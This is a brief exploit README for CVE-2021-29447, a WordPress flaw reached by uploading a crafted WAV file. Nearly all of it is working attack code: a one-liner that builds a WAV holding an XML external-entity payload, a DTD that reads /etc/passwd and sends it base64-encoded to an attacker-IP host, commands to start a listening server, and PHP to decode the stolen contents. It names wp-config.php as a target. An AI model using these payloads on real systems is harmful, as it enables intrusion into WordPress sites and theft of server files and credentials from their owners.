# CVE-2021-29447

* Upload of wav file has following consequences
    * **Arbitrary File Disclosure** for example `wp-config.php`
    * **Server Side Request Forgery** 


## Usage

* Create `wav` Payload
```sh
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://<attacker-IP>:<Port>/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```
* Create `dtd` Payload, which is downloaded from attacker machine by the wp instance. Following payload
```sh
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://<attacker-IP>:<attackerPort>/?p=%file;'>" >
```

* Launch http server
```sh
php -S 0.0.0.0:8000
python -m http.server
```
* Copy returned base64 into `php` file
```php
<?php echo zlib_decode(base64_decode('<returnedBase64>')); ?> 
```